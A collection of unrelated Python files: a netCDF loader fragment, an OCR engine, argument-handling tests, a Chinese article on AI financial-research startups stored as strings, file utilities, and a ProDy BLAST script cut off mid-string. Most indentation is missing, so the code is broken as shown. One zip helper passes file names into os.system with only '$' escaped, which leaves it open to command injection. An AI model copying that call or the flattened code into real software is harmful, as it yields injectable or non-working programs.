data.variables[key].getncattr(nc_key)
mdata[key] = meta_dict
if len(data.variables[key].dimensions) == 2:
# part of dataframe within dataframe
two_d_keys.append(key)
two_d_dims.append(data.variables[key].dimensions)
if len(data.variables[key].dimensions) == 3:
warnings.warn(' '.join(["Support for 3D data in pandas",
"will be removed in pysat 3.0",
"Please use xarray for",
"multi-dimension data."]),
DeprecationWarning, stacklevel=2)
# part of full/dedicated dataframe within dataframe
three_d_keys.append(key)
three_d_dims.append(data.variables[key].dimensions)
# we now have a list of keys that need to go into a dataframe,
# could be more than one, collect unique dimensions for 2D keys
for dim in set(two_d_dims):
# first or second dimension could be epoch
# Use other dimension name as variable name
if dim[0] == epoch_name:
obj_key_name = dim[1]
elif dim[1] == epoch_name:
obj_key_name = dim[0]
else:
raise KeyError('Epoch not found!')
# collect variable names associated with dimension
idx_bool = [dim == i for i in two_d_dims]
idx, = np.where(np.array(idx_bool))
obj_var_keys = []
clean_var_keys = []
for i in idx:
obj_var_keys.append(two_d_keys[i])
clean_var_keys.append(
two_d_keys[i].split(obj_key_name + '_')[-1])
# figure out how to index this data, it could provide its
# own index - or we may have to create simple integer based
# DataFrame access. If the dimension is stored as its own
# variable then use that info for index
if obj_key_name in obj_var_keys:
                        # string used to identify dimension also in
# data.variables will be used as an index
index_key_name = obj_key_name
# if the object index uses UNIX time, process into
# datetime index
if data.variables[obj_key_name].getncattr(name_label) == \
epoch_name:
# name to be used in DataFrame index
index_name = epoch_name
time_index_flag = True
else:
time_index_flag = False
# label to be used in DataFrame index
index_name = \
data.variables[obj_key_name].getncattr(name_label)
else:
# dimension is not itself a variable
index_key_name = None
# iterate over the variables and grab metadata
dim_meta_data = pysat.Meta(units_label=units_label,
name_label=name_label,
notes_label=notes_label,
desc_label=desc_label,
plot_label=plot_label,
axis_label=axis_label,
scale_label=scale_label,
min_label=min_label,
max_label=max_label,
fill_label=fill_label)
for key, clean_key in zip(obj_var_keys, clean_var_keys):
                        # store attributes in metadata, except for dim name
meta_dict = {}
for nc_key in data.variables[key].ncattrs():
meta_dict[nc_key] = \
data.variables[key].getncattr(nc_key)
dim_meta_data[clean_key] = meta_dict
dim_meta_dict = {'meta': dim_meta_data}
if index_key_name is not None:
# add top level meta
for nc_key in data.variables[obj_key_name].ncattrs():
dim_meta_dict[nc_key] = \
data.variables[obj_key_name].getncattr(nc_key)
mdata[obj_key_name] = dim_meta_dict
# iterate over all variables with this dimension
# data storage, whole shebang
loop_dict = {}
# list holds a series of slices, parsed from dict above
loop_list = []
for key, clean_key in zip(obj_var_keys, clean_var_keys):
# data
loop_dict[clean_key] = \
data.variables[key][:, :].flatten(order='C')
# number of values in time
loop_lim = data.variables[obj_var_keys[0]].shape[0]
# number of values per time
step_size = len(data.variables[obj_var_keys[0]][0, :])
# check if there is an index we should use
if not (index_key_name is None):
# an index was found
time_var = loop_dict.pop(index_key_name)
if time_index_flag:
# create datetime index from data
time_var = pds.to_datetime(1E6 * time_var)
new_index = time_var
new_index_name = index_name
else:
# using integer indexing
new_index = np.arange(loop_lim*step_size,
dtype=int) % step_size
new_index_name = 'index'
# load all data into frame
if len(loop_dict.keys()) > 1:
loop_frame = pds.DataFrame(loop_dict,
columns=clean_var_keys)
if obj_key_name in loop_frame:
del loop_frame[obj_key_name]
# break massive frame into bunch of smaller frames
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1), :])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
else:
loop_frame = pds.Series(loop_dict[clean_var_keys[0]],
name=obj_var_keys[0])
# break massive series into bunch of smaller series
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1)])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
# add 2D object data, all based on a unique dimension within
# netCDF, to loaded data dictionary
loadedVars[obj_key_name] = loop_list
del loop_list
# we now have a list of keys that need to go into a dataframe,
# could be more than one, collect unique dimensions for 2D keys
for dim in set(three_d_dims):
# collect variable names associated with dimension
idx_bool = [dim == i for i in three_d_dims]
idx, = np.where(np.array(idx_bool))
obj_var_keys = []
for i in idx:
obj_var_keys.append(three_d_keys[i])
for obj_key_name in obj_var_keys:
# store attributes in metadata
meta_dict = {}
for nc_key in data.variables[obj_key_name].ncattrs():
meta_dict[nc_key] = \
data.variables[obj_key_name].getncattr(nc_key)
mdata[obj_key_name] = meta_dict
# iterate over all variables with this dimension and store
# data
loop_dict = {}
# list holds a series of slices, parsed from dict above
loop_list = []
loop_dict[obj_key_name] = \
data.variables[obj_key_name][:, :, :]
# number of values in time
loop_lim = data.variables[obj_key_name].shape[0]
# number of values per time
step_size_x = len(data.variables[obj_key_name][0, :, 0])
step_size_y = len(data.variables[obj_key_name][0, 0, :])
step_size = step_size_x
loop_dict[obj_key_name] = \
loop_dict[obj_key_name].reshape((loop_lim*step_size_x,
step_size_y))
# check if there is an index we should use
if not (index_key_name is None):
# an index was found
time_var = loop_dict.pop(index_key_name)
if time_index_flag:
# create datetime index from data
time_var = pds.to_datetime(1E6 * time_var)
new_index = time_var
new_index_name = index_name
else:
# using integer indexing
new_index = np.arange(loop_lim*step_size,
dtype=int) % step_size
new_index_name = 'index'
# load all data into frame
loop_frame = pds.DataFrame(loop_dict[obj_key_name])
# del loop_frame['dimension_1']
# break massive frame into bunch of smaller frames
for i in np.arange(loop_lim, dtype=int):
loop_list.append(loop_frame.iloc[step_size*i:step_size*(i+1), :])
loop_list[-1].index = new_index[step_size*i:step_size*(i+1)]
loop_list[-1].index.name = new_index_name
# add 2D object data, all based on a unique dimension
# within netCDF, to loaded data dictionary
loadedVars[obj_key_name] = loop_list
del loop_list
# prepare dataframe index for this netcdf file
time_var = loadedVars.pop(epoch_name)
# convert from GPS seconds to seconds used in pandas (unix time,
# no leap)
# time_var = convert_gps_to_unix_seconds(time_var)
loadedVars[epoch_name] = \
pds.to_datetime((1E6 * time_var).astype(int))
running_store.append(loadedVars)
running_idx += len(loadedVars[epoch_name])
if strict_meta:
if saved_mdata is None:
saved_mdata = copy.deepcopy(mdata)
elif (mdata != saved_mdata):
raise ValueError(' '.join(('Metadata across filenames',
'is not the same.')))
# combine all of the data loaded across files together
out = []
for item in running_store:
out.append(pds.DataFrame.from_records(item, index=epoch_name))
out = pds.concat(out, axis=0)
else:
if len(fnames) == 1:
out = xr.open_dataset(fnames[0])
else:
out = xr.open_mfdataset(fnames, combine='by_coords')
for key in out.variables.keys():
# Copy the variable attributes from the data object to the metadata
meta_dict = {}
for nc_key in out.variables[key].attrs.keys():
meta_dict[nc_key] = out.variables[key].attrs[nc_key]
mdata[key] = meta_dict
# Remove variable attributes from the data object
out.variables[key].attrs = {}
# Copy the file attributes from the data object to the metadata
for d in out.attrs.keys():
if hasattr(mdata, d):
mdata.__setattr__(d+'_', out.attrs[d])
else:
mdata.__setattr__(d, out.attrs[d])
# Remove attributes from the data object
out.attrs = {}
return out, mdata
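# Usage sketch ('sample.nc' is only an assumed filename):
# data, meta = load_netcdf4('sample.nc', epoch_name='Epoch')
# # data: pandas DataFrame (or xarray Dataset when pandas_format=False); meta: pysat.Meta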
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import json
import cv2
import numpy as np
from os.path import isabs, realpath, join, dirname
from scipy import sparse
from .softmax import softmax
class BaseEngineLineOCR(object):
def __init__(self, json_def, gpu_id=0, batch_size=8):
with open(json_def, 'r', encoding='utf8') as f:
self.config = json.load(f)
self.line_px_height = self.config['line_px_height']
self.line_vertical_scale = self.config['line_vertical_scale']
if isabs(self.config['checkpoint']):
self.checkpoint = self.config['checkpoint']
else:
self.checkpoint = realpath(join(dirname(json_def), self.config['checkpoint']))
self.characters = tuple(self.config['characters'])
self.net_name = self.config['net_name']
if "embed_num" in self.config:
self.embed_num = int(self.config["embed_num"])
else:
self.embed_num = None
if "embed_id" in self.config:
if self.config["embed_id"] != "mean":
self.embed_id = int(self.config["embed_id"])
else:
self.embed_id = "mean"
else:
self.embed_id = None
self.gpu_id = gpu_id
self.batch_size = batch_size
self.line_padding_px = 32
self.max_input_horizontal_pixels = 480 * batch_size
def process_lines(self, lines, sparse_logits=True, tight_crop_logits=False):
"""Runs ocr network on multiple lines.
Args:
lines (iterable): contains cropped lines as numpy arrays.
Returns:
transcripts (list of strings): contains UTF-8 line transcripts
            logits (list of sparse matrices): character logits for lines
            logit_coords (list of [start, end]): logit indices covering each line crop
        """
# check line crops for correct shape
        for line in lines:
            if line.shape[0] != self.line_px_height:
                raise ValueError("Line height needs to be {} for this ocr network and is {} instead.".format(self.line_px_height, line.shape[0]))
            if line.shape[2] != 3:
                raise ValueError("Line crops need three color channels, but this one has {}.".format(line.shape[2]))
all_transcriptions = [None]*len(lines)
all_logits = [None]*len(lines)
all_logit_coords = [None]*len(lines)
# process all lines ordered by their length
line_ids = [x for x, y in sorted(enumerate(lines), key=lambda x: -x[1].shape[1])]
while line_ids:
max_width = lines[line_ids[0]].shape[1]
max_width = int(np.ceil(max_width / 32.0) * 32)
batch_size = max(1, self.max_input_horizontal_pixels // max_width)
batch_line_ids = line_ids[:batch_size]
line_ids = line_ids[batch_size:]
batch_data = np.zeros(
[len(batch_line_ids), self.line_px_height, max_width + 2*self.line_padding_px, 3], dtype=np.uint8)
for data, ids in zip(batch_data, batch_line_ids):
data[:, self.line_padding_px:self.line_padding_px+lines[ids].shape[1], :] = lines[ids]
if batch_data.shape[2] > self.max_input_horizontal_pixels:
print(f'WARNING: Line too long for OCR engine. Cropping from {batch_data.shape[2]} px down to {self.max_input_horizontal_pixels}.')
batch_data = batch_data[:, :, :self.max_input_horizontal_pixels]
out_transcriptions, out_logits = self.run_ocr(batch_data)
for ids, transcription, line_logits in zip(batch_line_ids, out_transcriptions, out_logits):
all_transcriptions[ids] = transcription
if tight_crop_logits:
line_logits = line_logits[
int(self.line_padding_px // self.net_subsampling):int(
(self.line_padding_px + lines[ids].shape[1]) // self.net_subsampling)]
all_logit_coords[ids] = [None, None]
#else:
# line_logits = line_logits[
# int(self.line_padding_px // self.net_subsampling - 2):int(
# lines[ids].shape[1] // self.net_subsampling + 8)]
else:
all_logit_coords[ids] = [
int(self.line_padding_px // self.net_subsampling),
int((self.line_padding_px + lines[ids].shape[1]) // self.net_subsampling)]
if sparse_logits:
line_probs = softmax(line_logits, axis=1)
line_logits[line_probs < 0.0001] = 0
line_logits = sparse.csc_matrix(line_logits)
all_logits[ids] = line_logits
return all_transcriptions, all_logits, all_logit_coords
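# Usage sketch (the JSON path and image are assumed examples; see test_line_ocr below for a full demo):
# engine = EngineLineOCR('ocr_engine.json', gpu_id=0)
# transcripts, logits, logit_coords = engine.process_lines([line_crop])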
class EngineLineOCR(BaseEngineLineOCR):
def __init__(self, json_def, gpu_id=0, batch_size=8):
        super(EngineLineOCR, self).__init__(json_def, gpu_id=gpu_id, batch_size=batch_size)
import tensorflow as tf
from .CTC_nets import build_eval_net, line_nets
self.net_graph = tf.Graph()
tf.reset_default_graph()
with self.net_graph.as_default():
net = line_nets[self.net_name]
(saver, input_data, _, seq_len, logits, logits_t, decoded, _) = build_eval_net(
[self.batch_size, self.line_px_height, None, 3], len(self.characters), net)
self.net_subsampling = 1
self.out_decoded = decoded
self.out_logits = logits
self.in_seq_len = seq_len
self.saver = saver
self.input_data = input_data
if gpu_id is None:
config = tf.ConfigProto(device_count={'GPU': 0})
else:
config = tf.ConfigProto(device_count={'GPU': 1})
config.gpu_options.allow_growth = True
self.session = tf.Session(graph=self.net_graph, config=config)
self.saver.restore(self.session, self.checkpoint)
self.data_shape = [self.batch_size, self.line_px_height, None, 3]
self.data_shape[2] = 128
out_logits, = self.session.run(
[self.out_logits],
feed_dict={self.input_data: np.zeros(self.data_shape, dtype=np.uint8)}
)
self.net_subsampling = self.data_shape[2] / out_logits.shape[1]
self.data_shape[2] = None
def run_ocr(self, batch_data):
seq_lengths = np.ones([self.batch_size], dtype=np.int32) * batch_data.shape[2] / self.net_subsampling
out_decoded, out_logits = self.session.run(
[self.out_decoded, self.out_logits],
feed_dict={self.input_data: batch_data, self.in_seq_len: seq_lengths})
out_decoded = out_decoded[0]
transcriptions = [None] * batch_data.shape[0]
for i in range(batch_data.shape[0]):
pos, = np.nonzero(out_decoded.indices[:, 0] == i)
tmp_string = ''
if pos.size:
for val in out_decoded.values[pos]:
tmp_string += self.characters[val]
transcriptions[i] = tmp_string
return transcriptions, out_logits
def test_line_ocr(line_list, ocr_engine_json):
ocr_engine = EngineLineOCR(ocr_engine_json, gpu_id=1)
lines = []
for line in line_list:
line_img = cv2.imread(line, 1)
if line_img is None:
raise ValueError('Error: Could not read image "{}"'.format(line))
lines.append(line_img)
transcriptions, logits, _ = ocr_engine.process_lines(lines)
for transcription, line in zip(transcriptions, lines):
print(transcription)
cv2.imshow('out', line)
if cv2.waitKey() == 27:
return
def parseargs():
parser = argparse.ArgumentParser()
parser.add_argument('--ocr-engine', required=True, help='JSON file with line ocr engine definition.')
parser.add_argument('--line-list', required=True, help='File containing list of line images.')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parseargs()
with open(args.line_list, 'r') as f:
lines = [l.strip() for l in f.readlines()]
test_line_ocr(lines, args.ocr_engine)
|
from testutils import assert_raises
def no_args():
pass
no_args()
assert_raises(TypeError, no_args, 'one_arg', _msg='1 arg to no_args')
assert_raises(TypeError, no_args, kw='should fail', _msg='kwarg to no_args')
def one_arg(arg):
return arg
one_arg('one_arg')
assert "arg" == one_arg(arg="arg")
assert_raises(TypeError, one_arg, _msg='no args to one_arg')
assert_raises(TypeError,
lambda: one_arg(wrong_arg='wont work'),
'incorrect kwarg to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', 'two_arg'),
'two args to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', extra_arg='wont work'),
'no TypeError raised: extra kwarg to one_arg')
assert_raises(TypeError,
lambda: one_arg('one_arg', arg='duplicate'),
'same pos and kwarg to one_arg')
def one_default_arg(arg="default"):
return arg
assert 'default' == one_default_arg()
assert 'arg' == one_default_arg('arg')
assert 'kwarg' == one_default_arg(arg='kwarg')
assert_raises(TypeError,
lambda: one_default_arg('one_arg', 'two_arg'),
'two args to one_default_arg')
def one_normal_one_default_arg(pos, arg="default"):
return pos, arg
assert ('arg', 'default') == one_normal_one_default_arg('arg')
assert ('arg', 'arg2') == one_normal_one_default_arg('arg', 'arg2')
assert_raises(TypeError,
lambda: one_normal_one_default_arg(),
'no args to one_normal_one_default_arg')
assert_raises(TypeError,
lambda: one_normal_one_default_arg('one', 'two', 'three'),
'three args to one_normal_one_default_arg')
def two_pos(a, b):
return (a, b)
assert ('a', 'b') == two_pos('a', 'b')
assert ('a', 'b') == two_pos(b='b', a='a')
def kwargs_are_variable(x=[]):
x.append(1)
return x
assert [1] == kwargs_are_variable()
assert [1, 1] == kwargs_are_variable()
|
#!/usr/bin/python
# encoding: utf-8
"""
@author: Ian
@contact:yongguiluo@hotmail.com
@file: text.py.py
@time: 2019/3/20 14:02
"""
title = '智能金融起锚:文因、数库、通联瞄准的kensho革命'
text = '''2015年9月13日,39岁的鲍捷乘上从硅谷至北京的飞机,开启了他心中的金融梦想。
鲍捷,人工智能博士后,如今他是文因互联公司创始人兼CEO。和鲍捷一样,越来越多的硅谷以及华尔街的金融和科技人才已经踏上了归国创业征程。
在硅谷和华尔街,已涌现出Alphasense、Kensho等智能金融公司。
如今,这些公司已经成长为独角兽。
大数据、算法驱动的人工智能已经进入到金融领域。人工智能有望在金融领域最新爆发。
前段时间,笔者写完了《激荡二十五年:Wind、同花顺、东方财富、大智慧等金融服务商争霸史》、《边缘崛起:雪球、老虎、富途、牛股王等互联网券商的新玩法》,探讨了互联网时代、移动互联网时代创业者们的创想。
人工智能与金融正在融合,这里我们聚焦一下投研领域,后续会向交易、投顾等领域延展。这篇文章将描绘一下Kensho、文因互联、数库科技、通联数据在这个领域的探索和尝试,看看新时代正在掀起的巨浪。
1、Kensho的颠覆式革命
华尔街的Kensho是金融数据分析领域里谁也绕不过的一个独角兽。这家公司获得由高盛领投的6280万美元投资,总融资高达7280万美元。
33岁的Kensho创始人Daniel Nadler预言:在未来十年内,由于Kensho和其他自动化软件,金融行业有三分之一到二分之一的雇员将失业。
2014年,Nadler在哈佛大学学习数学和古希腊文化。大学期间,他在美联储担任访问学者时惊奇地发现,这家全球最具权势的金融监管机构仍然依靠Excel来对经济进行分析。
当时,希腊选举以及整个欧洲的不稳定局面正强烈冲击金融市场。访问期间,Nadler意识到无论是监管者还是银行家,除了翻过去的新闻消息以外,并不能给出什么好的方案。
于是,他和麻省理工学院的好友一起想办法,并借鉴Google的信息处理方法,来分析资本市场,设计出了Kensho软件。
一个典型的工作场景是:早上八点,华尔街的金融分析师冲进办公室,等待即将在8点半公布的劳工统计局月度就业报告。他打开电脑,用Kensho软件搜集劳工部数据。
两分钟之内,一份Kensho自动分析报告便出现在他的电脑屏幕上:一份简明的概览,随后是13份基于以往类似就业报告对投资情况的预测。
金融分析师们再无需检查,因为Kensho提取的这些分析基于来自数十个数据库的成千上万条数据。
Kensho界面与Google相似,由一条简单的黑色搜索框构成。其搜索引擎自动将发生的事件根据抽象特征进行分类。
福布斯报道过运用Kensho的成功案例。例如,英国脱欧期间,交易员成功运用Kensho了解到退欧选举造成当地货币贬值;此外,Kensho还分析了美国总统任期的前100天内股票涨跌情况(见下图):
(图片来源:福布斯)
Kensho在构建金融与万物的关联,并用结构化、数据化的方式去呈现。公司还专门雇佣了一位机器学习专家,而这位专家此前为谷歌研究世界图书馆的大型分类方法。
处理复杂的事件与投资关联,Kensho只需要几分钟。但是在华尔街一个普通的分析师需要几天时间去测算对各类资产的影响。而这些分析师普遍拿着30—40万美元的年薪。
此外,硅谷的创业公司AlphaSense公司已经悄然建成了一个解决专业信息获取和解决信息碎片问题的金融搜索引擎。
AlphaSense的首席执行官Jack Kukko曾是摩根士丹利分析师,这赋予了其强大的金融基因。
AlphaSense可以搜索“研究文献,包括公司提交的文件证明、演示、实时新闻、新闻报道、华尔街的投资研究、以及客户的内部内容。”
AlphaSense几秒钟内即可搜索数百万个不同的财务文档, 公司内部纰漏内容和卖方研究等,使用户可以快速发现关键数据点,并通过智能提醒、跟踪重要信息点、防止数据遗漏,做出关键的决策。
AlphaSense目前已经向包括摩根大通等投资和咨询公司、全球银行、律师事务所和公司(如甲骨文)等500余位客户提供服务。
2、海归博士的智能金融实验
2017年6月,在北京朝阳区的一个居民楼的办公室内,鲍捷和他的20名创业伙伴正在摸索打造一款智能金融分析工具,而他的目标正是华尔街的AlphaSense和Kensho。
41岁的鲍捷很享受创业,他说在中国这是最好的创业时代。在此之前,他有一段漫长的求学历程。
鲍捷是一个信息整理控,他从小学开始整理所有的历史人物、水文地理、卡通人物的关系等。合肥工业大学研究生阶段,他师从德国斯图加特大学归来的博士高隽,学习人工智能,深度研究神经网络。
2001年,他离开中国进入美国,先后为Lowa State Univ博士、RPI博士后、MIT访问研究员、BBN访问研究员,在美国完成了11年人工智能的学习和研究。他先后师从语义网创始人Jim Hendler和万维网发明人、图灵奖得主Tim Berners-Lee,参与了语义网学科形成期间的一些关键研究项目,并是知识图谱国际标准OWL的作者之一。
2013年,在三星研究院工作不到两年后,他开始了在硅谷的创业,研发了一款名为“好东西传送门”的产品。
该产品主要利用机器人程序在网站抓取人工智能、机器学习、大数据的最新技术资讯,利用专业领域知识过滤后,自动生产内容,传送至需要的人。
好东西传送门获取了数万铁粉,但无法盈利。2015年9月,他离开硅谷飞往北京,归国的第一天,便获得了无量资本100万美元的天使轮融资。他在中国创立了“文因互联”。
其实鲍捷很早就看到了人工智能和金融结合的前景。在2010年,他就提出了金融报表语言XBRL的语义模型。2015年底,他看到了Kensho在金融领域带来的革命,结合国内的投资需求,他选择了在新三板领域开始切入,当时只有7名员工,经过半年研发,文因在2016年5月推出了“快报”和“搜索”。
“快报”能够自动抓取每日公告、财报、新闻资讯等;而“搜索”能够自动提取产业链上下游公司、结构化财报等各类数据。
“这两款产品为我们获取了1万铁粉,虽然产品有很多缺陷,但是依旧很多人喜欢这个工具,因为以前没有能够满足这种需求的服务。”鲍捷向华尔街见闻表示。
但是他们发现做搜索需要庞大的知识架构,需要去集成各种金融相关数据,开发公司标签、产业标签、产业链等复杂的知识图谱,而做这个体系,再烧几亿,可能也无法完成。
更为恐怖的是,做完产品还要和金融信息服务商竞争。Wind、同花顺、东方财富,挡在了文因互联面前。
“我放弃了从头到尾设计一个大系统的想法,而是从具体场景出发解决单点问题。从年底开始我分了一部分人去做项目,但每一个项目都是我们大系统里面的一个组件,这个项目根据金融客户的真实需求去打磨,然后将这些组件整合为一个系统的产品。”鲍捷反思道,创业需要寻找用户最痛的点,然后扎下去解决问题。
经过一年的创业,鲍捷变得更接地气。去年下半年以来,他密集地拜访各大银行、基金、保险、券商,根据金融机构的需求,在标准化产品之上定制化,从具体业务的自动化出发走向智能化。
目前恒丰银行、南京银行、中债资信等均已成为文因互联的合作客户。
文因互联很快根据金融机构的需求开发出了公告摘要、自动化报告、财报结构化数据等多个软件产品,并开发出了投研小机器人。
2016年年底,文因互联再次获得睿鲸资本Pre-A轮融资。而这位睿鲸资本的投资人,曾经是鲍捷的网友,他们经常在一起讨论人工智能问题。
鲍捷举例说,深市、沪市、新三板加在一起每天平均大概3000-4000份公告,每天处理公告数据提取和摘要,这是一件非常繁琐的事情。很多金融机构要养20多人处理公告,而且这些人还不能快速高效准确地处理。这类事情机器做最适合。给机器程序输入金融知识,并通过模型训练,能够快速准确地提取各项公告摘要和年报摘要。
鲍捷表示,文因互联长远目标是Kensho,用人工智能提升金融投研效率和渠道效率,而这还有很长的路要走。
3、中国式创新距离Kensho有多远?
上海的另外一位海归,也选择在金融研投领域创业,他叫刘彦,已经归国创业了八年。
八年前,他创立的数库科技,如今获得了京东金融1000万美元的投资。
2003年,23岁的他从密歇根商学院毕业,进入华尔街瑞信公司,一年后他主动调到香港分公司。 5年里,他主导完成了建设银行、工商银行、太平洋保险等大公司的上市项目。
华尔街2008年的金融危机波及全球,人性的贪婪和恐惧暴露无遗。在刘彦眼里,从数据层面到决策层面,每一个环节都充斥着被加工过的信息。2009年,他选择回到上海创业。刘彦最初的野心很大,想构建中国的彭博终端,他花费两年的时间构建完成“半结构化数据”。
2011年,数库获得穆迪资本500万美元投资。很快,原公司从70人扩张到140人。但因数库的战略计划并未完成,穆迪资本放弃进一步投资,他和联合创始人沈鑫卖掉房子,继续维持运营。
刘彦破釜沉舟,公司很快攻克了信息识别系统和精度抓取,并在深度分析等方面取得突破。
数库科技试图覆盖全球上市公司:A股3218家、港股1993家美股4953家、新三板10725家、非上市金融490家、股权交易中心2467家。
目前,数库主要服务于B端金融机构。数库自称核心独家的产品有两款:其一、SAM(Segment Analytics Mapping)行业分析工具。数库是根据上市公司实际披露的产品分项推导出其行业分类,会根据上市公司的定期报告实时做出调整。数库行业分类,分为10个层级,4000个产品节点,帮助投资者快速了解产业竞争环境、系统化对比公司财务及运营数据。其二、产业链的分析工具。数库在行业分析工具SAM的基础上,衍生出的一个分析工具。从产业链条的角度,将上市公司通过产品相互关联,帮助投资人优先布局上下游的投资机会。
刘彦的终极理想是通过科技的发展,使金融从“投机”和“博弈”中逐渐走出来,走向非人为的自动化运行,把专业人士和投资弱势群体之间的距离拉近,使个人拥有机构投资者的能力。
这两年,科技金融成为创投最热的风口。中国的大集团也瞄准了这个产业变革的机会。国内民营巨头万向集团看准了智能金融这个方向。
2011年,万向集团挖来了时任博时基金总经理肖风,担任万向集团副董事长。他迅速构建起庞大的金融帝国:浙商银行、浙商基金、民生人寿、万向财务、通联数据等公司。
2013年12月,注册资本3亿元的通联数据在上海创立,肖峰为创始人兼董事长。
通联数据的野心很庞大,目前员工达到300人,正面与Wind、同花顺、东方财富竞争,并推出了PC和移动端的资产管理业务的一站式服务平台,内容涵盖大数据分析、智能投资研究、量化研究、智能投顾和资产配置管理服务等多个领域。
通联数据认为,自己的核心是有一批高素质的技术人才,同时还有顶级金融人才。
2017年6月6日,恒生电子正式面向金融机构推出最新的人工智能产品:涵盖智能投资、智能资讯、智能投顾、智能客服四大领域。其中一款产品智能小梵可通过强大人机自然交互,提供精准数据提炼及智能资讯分析。
在笔者的走访中,越来越多高科技人才、金融人才进入智能金融投研领域,这个领域已经成为红海。
谁能够乘着人工智能浪潮,成为新一代的金融信息服务终端?
敬请关注后续报道。
'''
|
__author__ = 'thorwhalen'
# utils to get from a pfile to... something else
from ut.pfile.name import replace_extension
import os
import gzip
def string(filename):
"""
returns the string contents of a pfile
"""
    fid = open(filename)
s = fid.read()
fid.close()
return s
def zip_file(source_file, destination_file=None):
if destination_file is None: # if no destination file is given, add the .zip extension to create the dest file
destination_file = source_file + '.zip'
assert destination_file != source_file # to make sure source and destination are not the same
elif os.path.isdir(destination_file):
destination_file = os.path.join(destination_file, source_file + '.zip')
    source_file = source_file.replace('$', r'\$')  # escape the shell-special character $ as \$
    os_system_result = os.system('zip "' + destination_file.replace('$', r'\$') + '" "' + source_file + '"')
return destination_file
def gzip_file(source_file, destination_file=None):
import gzip
if destination_file is None: # if no destination file is given, add the .zip extension to create the dest file
destination_file = source_file + '.gzip'
assert destination_file != source_file # to make sure source and destination are not the same
elif os.path.isdir(destination_file):
destination_file = os.path.join(destination_file, source_file + '.gzip')
with open(source_file, 'rb') as orig_file:
with gzip.open(destination_file, 'wb') as zipped_file:
zipped_file.writelines(orig_file)
return destination_file
def ungzip(gzip_file, destination_file):
in_file = gzip.open(gzip_file, 'rb')
out_file = open(destination_file, 'wb')
out_file.write(in_file.read())
in_file.close()
out_file.close()
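# Usage sketch (filenames are assumed examples): round-trip a file through gzip_file/ungzip.
# zipped = gzip_file('report.txt')          # writes report.txt.gzip next to the source
# ungzip(zipped, 'report_restored.txt')     # decompress back to plain text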
def tail(f, window=20):
"""
    Returns the last `window` lines of file `f`, joined into a single string.
"""
if isinstance(f, str):
f = open(f, 'r')
file_should_be_closed = True
else:
file_should_be_closed = False
if window == 0:
return []
BUFSIZ = 1024
f.seek(0, 2)
bytes = f.tell()
size = window + 1
block = -1
data = []
while size > 0 and bytes > 0:
if bytes - BUFSIZ > 0:
# Seek back one whole BUFSIZ
f.seek(block * BUFSIZ, 2)
# read BUFFER
data.insert(0, f.read(BUFSIZ))
else:
            # file too small, start from beginning
f.seek(0,0)
# only read what was not read
data.insert(0, f.read(bytes))
linesFound = data[0].count('\n')
size -= linesFound
bytes -= BUFSIZ
block -= 1
if file_should_be_closed:
f.close()
return '\n'.join(''.join(data).splitlines()[-window:])
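# Usage sketch (path is an assumed example):
# print(tail('/var/log/syslog', window=5))  # last 5 lines, joined with newlines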
|
from .sed import Sed, SedException, main
|
sum_square = square_sum = 0
for i in range(1, 101):
    sum_square += i**2          # sum of squares: 1^2 + 2^2 + ... + 100^2
    square_sum += i             # running sum, squared after the loop
square_sum = square_sum ** 2    # square of the sum: (1 + 2 + ... + 100)^2
resultat = square_sum - sum_square
print("Result")
print(resultat)
|
# ProDy: A Python Package for Protein Dynamics Analysis
#
# Copyright (C) 2010-2012 Ahmet Bakan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Blast Protein Data Bank for structures matching a user given sequence."""
__author__ = 'Ahmet Bakan'
__copyright__ = 'Copyright (C) 2010-2012 Ahmet Bakan'
import os.path
from actions import *
def readFirstSequenceFasta(filename):
"""Return first sequence from a file."""
fasta = open(filename)
seq = []
title = ''
first = True
for line in fasta:
if line[0] == '>':
if first:
title = line[1:].strip()
first = False
else:
break
else:
seq.append( line.strip() )
fasta.close()
return title, ''.join(seq)
def prody_blast(opt):
"""Blast search PDB based on command line arguments."""
import prody
LOGGER = prody.LOGGER
seq = opt.seq
title = None
if os.path.isfile(seq):
title, seq = readFirstSequenceFasta(seq)
LOGGER.info("First sequence ({0:s}) is parsed from {1:s}."
.format(title, repr(seq)))
if not seq.isalpha() or not seq.isupper():
opt.subparser.error("{0:s} is not a valid sequence or a file"
.format(repr(seq)))
folder, identity, coverage = opt.folder, opt.identity, opt.coverage
if not 0 < identity < 100:
opt.subparser.error('identity must be between 0 and 100')
if not 0 < coverage < 100:
opt.subparser.error('overlap must be between 0 and 100')
blast_results = prody.blastPDB(seq)
hits = blast_results.getHits(percent_identity=identity,
percent_coverage=coverage)
#sort hits by decreasing percent identity
hits2 = []
for pdb in hits:
hits2.append( (-hits[pdb]['percent_identity'], pdb) )
hits2.sort()
for identity, pdb in hits2:
chain = hits[pdb]['chain_id']
percent_identity = hits[pdb]['percent_identity']
title = hits[pdb]['title']
print(pdb + ' ' + chain + ' ' + ('%5.1f%%' % (percent_identity)) +
' ' + title)
# download hits if --folder is given
if opt.folder:
LOGGER.info('Downloading hits to ' + opt.folder)
pdblist = [ pdb for identity, pdb in hits2 ]
pdblist2 = prody.fetchPDB(pdblist, opt.folder,
compressed=opt.gzip, copy=True)
def addCommand(commands):
subparser = commands.add_parser('blast',
help='blast search Protein Data Bank')
subparser.add_argument('--quiet', help="suppress info messages to stderr",
action=Quiet, nargs=0)
subparser.add_argument('--examples', action=UsageExample, nargs=0,
help='show usage examples and exit')
subparser.set_defaults(usage_example=
"""Blast search PDB for the first sequence in a fasta file:
$ prody blast seq.fasta -i 70
Blast search PDB for the sequence argument:
